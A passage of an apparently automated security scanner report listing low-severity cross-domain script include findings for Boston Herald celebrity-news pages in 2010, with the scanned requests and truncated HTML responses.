<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

9.183. http://bostonherald.com/track/celebrity/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/celebrity/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /track/celebrity/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:50:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 55788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.184. http://bostonherald.com/track/inside_track/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/inside_track/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /track/inside_track/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:50:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 53539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.185. http://bostonherald.com/track/inside_track/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/inside_track/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

9.186. http://bostonherald.com/track/inside_track/view/20101107cake_boss_is_a_jersey_boy_at_heart/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/inside_track/view/20101107cake_boss_is_a_jersey_boy_at_heart/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/inside_track/view/20101107cake_boss_is_a_jersey_boy_at_heart/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:38:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.187. http://bostonherald.com/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:36:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 67975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.188. http://bostonherald.com/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:33:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.189. http://bostonherald.com/track/inside_track/view/20101107tracked_down_scott_listfield_terry_francona_joey_fatone__more/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/inside_track/view/20101107tracked_down_scott_listfield_terry_francona_joey_fatone__more/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/inside_track/view/20101107tracked_down_scott_listfield_terry_francona_joey_fatone__more/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:38:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.190. http://bostonherald.com/track/inside_track/view/20101107we_hearernie_boch_jr_sean_duffy__more/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/inside_track/view/20101107we_hearernie_boch_jr_sean_duffy__more/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/inside_track/view/20101107we_hearernie_boch_jr_sean_duffy__more/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:39:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.191. http://bostonherald.com/track/star_tracks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/star_tracks/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /track/star_tracks/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:50:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 51985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
